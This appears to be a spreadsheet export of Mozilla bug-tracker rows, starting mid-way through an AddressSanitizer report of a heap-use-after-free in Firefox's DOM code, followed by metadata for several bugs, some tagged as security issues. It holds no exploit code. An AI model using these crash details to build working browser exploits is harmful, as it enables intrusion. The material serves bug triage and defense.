    #40 0x7fcb7fa960e7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:528:16
    #41 0x7fcb7fa99ee3 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:961:9
    #42 0x7fcb81da5378 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1166:7
    #43 0x7fcb84f06cc2 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7169:21
    #44 0x7fcb84f030e9 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6962:7
    #45 0x7fcb84f0a8ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #46 0x7fcb7bacbb97 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
    #47 0x7fcb7bacac1a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
    #48 0x7fcb7bac77f8 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
    #49 0x7fcb7bac97bc in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
    #50 0x7fcb7baca7dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #51 0x7fcb79e825fa in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #52 0x7fcb7ceaa74a in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8340:18
    #53 0x7fcb7ceaa74a in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8262
    #54 0x7fcb7ce8afd4 in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5224:3
    #55 0x7fcb7cf9d314 in applyImpl&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1165:12
    #56 0x7fcb7cf9d314 in apply&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1171
    #57 0x7fcb7cf9d314 in mozilla::detail::RunnableMethodImpl&lt;nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1216
    #58 0x7fcb79c77821 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #59 0x7fcb79c96146 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1090:14
    #60 0x7fcb79cb2080 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #61 0x7fcb7ab9364a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #62 0x7fcb7aae6cf9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #63 0x7fcb7aae6cf9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #64 0x7fcb7aae6cf9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #65 0x7fcb8170643a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #66 0x7fcb859637bb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #67 0x7fcb7aae6cf9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #68 0x7fcb7aae6cf9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #69 0x7fcb7aae6cf9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #70 0x7fcb85963180 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #71 0x4f50dc in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #72 0x4f50dc in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282
    #73 0x7fcb999cc82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #74 0x42476c in _start (/fuzzer3/firefox/firefox+0x42476c)
0x61d0002671c8 is located 328 bytes inside of 1968-byte region [0x61d000267080,0x61d000267830)
freed by thread T0 (file:// Content) here:
    #0 0x4c5172 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fcb79b1d730 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7fcb79b25b1f in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7fcb79b25b1f in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3925
    #4 0x7fcb79b24fad in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3746:9
    #5 0x7fcb79b28ec2 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4315:21
    #6 0x7fcb7cf725de in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1488:3
    #7 0x7fcb7eda41da in mozilla::dom::FuzzingFunctionsBinding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:54:3
    #8 0x7fcb85c4c157 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #9 0x7fcb85c4c157 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468
    #10 0x7fcb85c36fa5 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:12
    #11 0x7fcb85c36fa5 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #12 0x7fcb85c1d4c6 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:418:12
    #13 0x7fcb85c4bed5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:490:15
    #14 0x7fcb85c4d152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:536:10
    #15 0x7fcb86794a5a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2981:12
    #16 0x7fcb7eb2ed05 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:51:8
    #17 0x7fcb7faaa64e in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #18 0x7fcb7faaa64e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1121
    #19 0x7fcb7faabddb in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1291:20
    #20 0x7fcb7fa960e7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:528:16
    #21 0x7fcb7fa99ee3 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:961:9
    #22 0x7fcb7cab1cc2 in nsContentUtils::MaybeFireNodeRemoved(nsINode*, nsINode*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4776:5
    #23 0x7fcb7cf5bc71 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1926:7
    #24 0x7fcb7cf59adc in InsertBefore /builds/worker/workspace/build/src/dom/base/nsINode.h:1847:12
    #25 0x7fcb7cf59adc in AppendChild /builds/worker/workspace/build/src/dom/base/nsINode.h:1851
    #26 0x7fcb7cf59adc in ConvertNodesOrStringsIntoNode(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, nsIDocument*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1454
    #27 0x7fcb7cf5ac33 in nsINode::Append(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1638:5
    #28 0x7fcb7ec79dd6 in mozilla::dom::ElementBinding::append(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:5175:9
    #29 0x7fcb7f381b81 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3280:13
    #30 0x7fcb85c4c157 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #31 0x7fcb85c4c157 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468
    #32 0x7fcb85c36fa5 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:12
    #33 0x7fcb85c36fa5 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #34 0x7fcb85c1d4c6 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:418:12
    #35 0x7fcb85c4bed5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:490:15
    #36 0x7fcb85c4d152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:536:10
    #37 0x7fcb86794a5a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2981:12
previously allocated by thread T0 (file:// Content) here:
    #0 0x4c54b3 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x4f5f7d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7fcb7fe7e170 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:156:12
    #3 0x7fcb7fe7e170 in NS_NewHTMLDocument(nsIDocument**, bool) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:156
    #4 0x7fcb811ea681 in NS_NewDOMDocument(nsIDocument**, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::DocumentType*, nsIURI*, nsIURI*, nsIPrincipal*, bool, nsIGlobalObject*, DocumentFlavor) /builds/worker/workspace/build/src/dom/xml/XMLDocument.cpp:86:10
    #5 0x7fcb7cc74d09 in mozilla::dom::DOMParser::SetUpDocument(DocumentFlavor, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/DOMParser.cpp:312:17
    #6 0x7fcb7cc747f6 in mozilla::dom::DOMParser::ParseFromString(nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::SupportedType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/DOMParser.cpp:68:38
    #7 0x7fcb7eab0708 in mozilla::dom::DOMParserBinding::parseFromString(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::DOMParser*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DOMParserBinding.cpp:79:49
    #8 0x7fcb7f381b81 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3280:13
    #9 0x7fcb85c4c157 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #10 0x7fcb85c4c157 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468
    #11 0x7fcb85c36fa5 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:12
    #12 0x7fcb85c36fa5 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #13 0x7fcb85c1d4c6 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:418:12
    #14 0x7fcb85c4bed5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:490:15
    #15 0x7fcb85c4d152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:536:10
    #16 0x7fcb86794a5a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2981:12
    #17 0x7fcb7eb298be in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #18 0x7fcb7fae611a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JSCompartment*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #19 0x7fcb7fae3a84 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #20 0x7fcb7faaa69d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1124:52
    #21 0x7fcb7faabddb in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1291:20
    #22 0x7fcb7fa960e7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:528:16
    #23 0x7fcb7fa99ee3 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:961:9
    #24 0x7fcb81da5378 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1166:7
    #25 0x7fcb84f06cc2 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7169:21
    #26 0x7fcb84f030e9 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6962:7
    #27 0x7fcb84f0a8ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #28 0x7fcb7bacbb97 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
    #29 0x7fcb7bacac1a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
    #30 0x7fcb7bac77f8 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
    #31 0x7fcb7bac97bc in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
    #32 0x7fcb7baca7dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5763:44 in CreateTextNode
Shadow bytes around the buggy address:
  0x0c3a80044de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a80044df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a80044e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a80044e10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a80044e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c3a80044e30: fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd
  0x0c3a80044e40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a80044e50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a80044e60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a80044e70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a80044e8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2349==ABORTING</t>
        </is>
      </c>
      <c r="X5590" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5591">
      <c r="A5591" t="n">
        <v>286813</v>
      </c>
      <c r="B5591" t="inlineStr">
        <is>
          <t>2005-03-18 17:25:26 -0800</t>
        </is>
      </c>
      <c r="C5591" t="inlineStr">
        <is>
          <t>[FIX]crash: linux nightly build crash in nsCSSFrameConstructor::CantRenderReplacedElement</t>
        </is>
      </c>
      <c r="D5591" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E5591" t="n">
        <v>1</v>
      </c>
      <c r="F5591" t="n">
        <v>1</v>
      </c>
      <c r="G5591" t="n">
        <v>3</v>
      </c>
      <c r="H5591" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5591" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5591" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K5591" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5591" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5591" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5591" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5591" t="inlineStr"/>
      <c r="Q5591" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5591" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5591" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T5591" t="n">
        <v>1</v>
      </c>
      <c r="U5591" t="n">
        <v>0</v>
      </c>
      <c r="V5591" t="n">
        <v>16</v>
      </c>
      <c r="W5591" t="inlineStr">
        <is>
          <t>testcase attached crashes nightly build on linux.</t>
        </is>
      </c>
      <c r="X5591" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5592">
      <c r="A5592" t="n">
        <v>798264</v>
      </c>
      <c r="B5592" t="inlineStr">
        <is>
          <t>2012-10-05 02:28:24 -0700</t>
        </is>
      </c>
      <c r="C5592" t="inlineStr">
        <is>
          <t>Xrays for new DOM bindings need to filter properties based on their compartment</t>
        </is>
      </c>
      <c r="D5592" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5592" t="n">
        <v>1</v>
      </c>
      <c r="F5592" t="n">
        <v>1</v>
      </c>
      <c r="G5592" t="n">
        <v>3</v>
      </c>
      <c r="H5592" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5592" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5592" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5592" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5592" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5592" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5592" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5592" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5592" t="inlineStr">
        <is>
          <t>[adv-track-main17+] (sec-moderate in Fx14-16, could exploit an unwise add-on)</t>
        </is>
      </c>
      <c r="Q5592" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5592" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5592" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5592" t="n">
        <v>1</v>
      </c>
      <c r="U5592" t="n">
        <v>0</v>
      </c>
      <c r="V5592" t="n">
        <v>30</v>
      </c>
      <c r="W5592" t="inlineStr">
        <is>
          <t>Right now we always expose ChromeOnly properties on Xrays, but we should only do that if the Xray is in a chrome compartment. We should probably do away with the dual property tables and have an additional flag in the table for chrome-only properties. The prototype setup can decide based on the compartment whether to add those or not, and the Xray code can pass in the flag's required value based on the Xray's compartment.</t>
        </is>
      </c>
      <c r="X5592" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5593">
      <c r="A5593" t="n">
        <v>206777</v>
      </c>
      <c r="B5593" t="inlineStr">
        <is>
          <t>2003-05-22 12:10:50 -0700</t>
        </is>
      </c>
      <c r="C5593" t="inlineStr">
        <is>
          <t>obsolete entries in mozilla/directory/c-sdk/ldap/build/.cvsignore</t>
        </is>
      </c>
      <c r="D5593" t="inlineStr">
        <is>
          <t>2003-10-01 08:03:15 -0700</t>
        </is>
      </c>
      <c r="E5593" t="n">
        <v>1</v>
      </c>
      <c r="F5593" t="n">
        <v>1</v>
      </c>
      <c r="G5593" t="n">
        <v>3</v>
      </c>
      <c r="H5593" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5593" t="inlineStr">
        <is>
          <t>Directory</t>
        </is>
      </c>
      <c r="J5593" t="inlineStr">
        <is>
          <t>LDAP C SDK</t>
        </is>
      </c>
      <c r="K5593" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5593" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5593" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5593" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5593" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5593" t="inlineStr"/>
      <c r="Q5593" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5593" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5593" t="inlineStr">
        <is>
          <t>5.13</t>
        </is>
      </c>
      <c r="T5593" t="n">
        <v>1</v>
      </c>
      <c r="U5593" t="n">
        <v>0</v>
      </c>
      <c r="V5593" t="n">
        <v>6</v>
      </c>
      <c r="W5593" t="inlineStr">
        <is>
          <t>The following obsolete entries in mozilla/directory/c-sdk/ldap/build/.cvsignore
should be removed:
Makefile
nspr-autoconf.mk
dirver</t>
        </is>
      </c>
      <c r="X5593" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5594">
      <c r="A5594" t="n">
        <v>1339259</v>
      </c>
      <c r="B5594" t="inlineStr">
        <is>
          <t>2017-02-13 15:03:05 -0800</t>
        </is>
      </c>
      <c r="C5594" t="inlineStr">
        <is>
          <t>Crash in mozilla::widget::AudioSession::OnSessionDisconnectedInternal</t>
        </is>
      </c>
      <c r="D5594" t="inlineStr">
        <is>
          <t>2018-08-28 22:49:30 -0700</t>
        </is>
      </c>
      <c r="E5594" t="n">
        <v>1</v>
      </c>
      <c r="F5594" t="n">
        <v>1</v>
      </c>
      <c r="G5594" t="n">
        <v>3</v>
      </c>
      <c r="H5594" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5594" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5594" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K5594" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5594" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5594" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5594" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5594" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5594" t="inlineStr">
        <is>
          <t>tpi:+, win7only[tbird crash][adv-main57+][adv-esr52.5+][post-critsmash-triage]</t>
